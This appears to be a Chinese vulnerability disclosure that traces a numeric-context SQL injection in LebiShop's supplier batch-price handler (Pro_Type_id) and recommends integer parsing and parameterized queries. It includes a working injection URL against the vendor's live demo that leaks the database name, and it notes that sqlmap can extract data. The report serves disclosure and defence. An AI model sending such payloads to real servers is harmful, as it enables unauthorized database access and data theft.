### 简要描述:

LebiShop商城系统最新版SQL注入五

### 详细说明:

LebiShop商城系统最新版存在一处SQL注入，位于文件 Shop.supplier.Ajax.Ajax_product：

```
// Shop.supplier.Ajax.Ajax_product
public void Product_Batch_Price_Update()
{
    if (!base.Power("supplier_product_batch_price", "批量调价"))
    {
        base.AjaxNoPower();
        return;
    }
    string step = RequestTool.RequestString("step");
    string dateFrom = RequestTool.RequestString("dateFrom");
    string dateTo = RequestTool.RequestString("dateTo");
    string Pro_Type_id = RequestTool.RequestString("Pro_Type_id");
    int brand = RequestTool.RequestInt("brand", 0);
    int tag = RequestTool.RequestInt("tag", 0);
    int price_markettype = RequestTool.RequestInt("price_markettype", 0);
    int price_marketvalue = RequestTool.RequestInt("price_marketvalue", 0);
    int price_marketadd = RequestTool.RequestInt("price_marketadd", 0);
    int price_costtype = RequestTool.RequestInt("price_costtype", 0);
    int price_costvalue = RequestTool.RequestInt("price_costvalue", 0);
    int price_costadd = RequestTool.RequestInt("price_costadd", 0);
    int pricetype = RequestTool.RequestInt("pricetype", 0);
    int pricevalue = RequestTool.RequestInt("pricevalue", 0);
    int priceadd = RequestTool.RequestInt("priceadd", 0);
    int addtype = RequestTool.RequestInt("addtype", 0);
    int addvalue = RequestTool.RequestInt("addvalue", 0);
    int reducetype = RequestTool.RequestInt("reducetype", 0);
    int reducevalue = RequestTool.RequestInt("reducevalue", 0);
    string mes = "";
    string where = "1=1";
    if (dateFrom != "" && dateTo != "")
    {
        string text = where;
        where = string.Concat(new string[] { text, " and (datediff(d,Time_Add,'", dateFrom, "')<=0 and datediff(d,Time_Add,'", dateTo, "')>=0)" });
        string text2 = mes;
        mes = string.Concat(new string[] { text2, "上架日期", dateFrom, "-", dateTo, ";" });
    }
    if (Pro_Type_id != "")
    {
        where = where + " and Pro_Type_id in (" + EX_Product.Categoryid(Pro_Type_id) + ")";
        mes = mes + "商品分类" + Pro_Type_id + ";";
    }
```

参数 Pro_Type_id 通过 RequestTool.RequestString("Pro_Type_id") 获取，而 RequestTool.RequestString 方法只对单引号做了替换：

```
// Shop.Tools.RequestTool
public static string RequestString(string nKey, string def)
{
    string ojb = HttpContext.Current.Request.QueryString[nKey];
    if (ojb != null)
    {
        return StringTool.InjectFiltrate(ojb.Trim());
    }
    ojb = HttpContext.Current.Request.Form[nKey];
    if (ojb != null)
    {
        return StringTool.InjectFiltrate(ojb.Trim());
    }
    return def;
}
// Shop.Tools.StringTool
public static string InjectFiltrate(string str)
{
    if (!StringTool.IsSafeSqlString(str))
    {
        str = str.Replace("'", "´");
    }
    return str;
}
```

随后 Pro_Type_id 进入 EX_Product.Categoryid 方法，跟进：

```
// Shop.Bussiness.EX_Product
public static string Categoryid(string id)
{
    string str = id.ToString();
    List<Lebi_Pro_Type> ts = B_Lebi_Pro_Type.GetList("Parentid=" + id + " and IsShow = 1", "Sort desc");
    foreach (Lebi_Pro_Type t in ts)
    {
        str = str + "," + EX_Product.Categoryid(string.Concat(t.id));
    }
    return str;
}
```

最终 Pro_Type_id 被直接拼接进 B_Lebi_Pro_Type.GetList 的查询条件（"Parentid=" + id），且没有用单引号包裹。由于该参数处于数字上下文，不需要单引号即可改写SQL语句，因此 InjectFiltrate 对单引号的替换在这里完全不起作用。修复建议：Pro_Type_id 应按整数处理（例如改用 RequestTool.RequestInt 或 int.TryParse 校验后再使用），并在 Categoryid 中改用参数化查询而不是字符串拼接。

### 漏洞证明:

官方 demo 演示，报出当前数据库：

```
http://plus.demo.lebi.cn/supplier/ajax/ajax_product.aspx?__Action=Product_Batch_Price_Update&url=/ Pro_Type_id=db_name()
```

[<img src="https://images.seebug.org/upload/201501/201638552ffddccb4f18fab2245c1cc0f964600e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/201638552ffddccb4f18fab2245c1cc0f964600e.png)

报出 servername（服务器主机名）：

[<img src="https://images.seebug.org/upload/201501/201640069ec30eb57be4dede9a55e91547e43153.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/201640069ec30eb57be4dede9a55e91547e43153.png)

sqlmap即可跑出数据